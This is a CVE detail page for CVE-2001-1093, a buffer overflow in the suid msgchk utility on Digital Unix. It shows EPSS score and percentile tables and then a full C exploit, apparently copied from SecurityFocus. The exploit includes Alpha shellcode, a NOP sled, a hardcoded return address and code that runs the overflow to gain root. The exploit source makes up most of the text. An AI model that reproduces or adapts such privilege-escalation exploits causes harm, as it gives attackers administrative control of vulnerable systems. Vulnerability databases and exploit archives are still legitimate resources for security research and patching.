CVE-2001-1093 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.9%	–	–
2022-04-03	–	–	1.9%	–	–
2022-04-24	–	–	1.9%	–	–
2022-09-11	–	–	1.9%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.16%
2025-03-30	–	–	–	–	0.16%
2025-04-15	–	–	–	–	0.16%
2025-04-15	–	–	–	–	0.16,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	55%
2022-04-03	75%
2022-04-24	76%
2022-09-11	77%
2023-03-12	–
2024-06-02	–
2025-01-19	–
2025-03-18	34%
2025-03-30	33%
2025-04-15	38%
2025-04-15	38%

// source: https://www.securityfocus.com/bid/3311/info The msgchk utility under certain versions of Digital Unix contains a buffer overflow vulnerability which could yield root privilege. If a local user invokes the msgchk utility at the command line, argumented with a sufficiently long string of bytes, a buffer overflow condition can be triggered. Where msgchk runs suid root, this can allow hostile code to be executed as root, granting an attacker administrative access to the vulnerable system. ++ msgchkx.c /* * 2001/09/05 - at the bench of windy fall * /usr/bin/mh/msgchk buffer overflow exploit code by truefinder , seo@igrus.inha.ac.kr * now we will drill /usr/bin/mh/msgchk * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define NOP 0x47ff041f #define ALIGNSIZE (4 + 1 ) #define BUFSIZE (8000 + 211 ) #define RETADDR 0x000000011ffffaa0 #define DEFNOPSIZE 7168 char nop[] = { 0x1f, 0x04, 0xff, 0x47, 0x00 }; char retaddr[] = { 0xa0, 0xea, 0xff, 0x1f, 0x01 , 0x00 }; static char shellcode[] = "\x30\x15\xd9\x43" /* subq $30,200,$16 */ "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */ "\x12\x94\x07\x42" /* addq $16,60,$18 */ "\xfc\xff\x32\xb2" /* stl $17,-4($18) */ "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */ "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */ "\xfc\xff\x30\xb2" /* stl $17,-4($16) */ "\xf9\xff\x1f\xd2" /* bsr $16,-28 */ "\x30\x15\xd9\x43" /* subq $30,200,$16 */ "\x31\x15\xd8\x43" /* subq $30,192,$17 */ "\x12\x04\xff\x47" /* clr $18 */ "\x40\xff\x1e\xb6" /* stq $16,-192($30) */ "\x48\xff\xfe\xb7" /* stq $31,-184($30) */ "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */ "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */ "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */ "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */ "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */ "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */ "\x38\xff\x7e\xb2" /* stl $19,-200($30) */ "\x13\x94\xe7\x43" /* addq $31,60,$19 */ "\x20\x35\x60\x42" /* subq $19,1,$0 */ "\xff\xff\xff\xff"; /* callsys ( disguised ) */ /* oh! this is ohhara's shellcode */ int main(int argc, char *argv[] ) { char *buf , *buf_ptr; int bufsize , alignsize , offset ; int i, totalsize; bufsize = BUFSIZE ; alignsize = ALIGNSIZE ; offset = 0 ; if ( argc < 1 ) { printf("usage : %s <bufsize> <align> <offset>\n", argv[0]); exit (-1); } if (argc > 1 ) bufsize = atoi( argv[1] ); if ( argc > 2 ) alignsize = atoi( argv[2] ) + ALIGNSIZE ; if ( argc > 3 ) offset = atoi ( argv[3] ); totalsize = alignsize + bufsize ; buf = malloc( totalsize ) ; memset ( buf, NULL , totalsize ); memset ( buf, 'A', alignsize ); buf_ptr = (char *)(buf + alignsize ); /* default nop size is 4096 bytes */ for ( i = 0 ; i < DEFNOPSIZE/4 ; i++ ) strcat ( buf_ptr , nop ); strcat ( buf_ptr, shellcode ); /* fill the block with 'A' */ for ( i =0 ; i < bufsize - DEFNOPSIZE - strlen(shellcode) - 8 ; i++ ) strcat( buf_ptr ,"A"); strcat ( buf_ptr , retaddr ); execl ("/var/tmp/mh/msgchk", "msgchk", buf, NULL ); }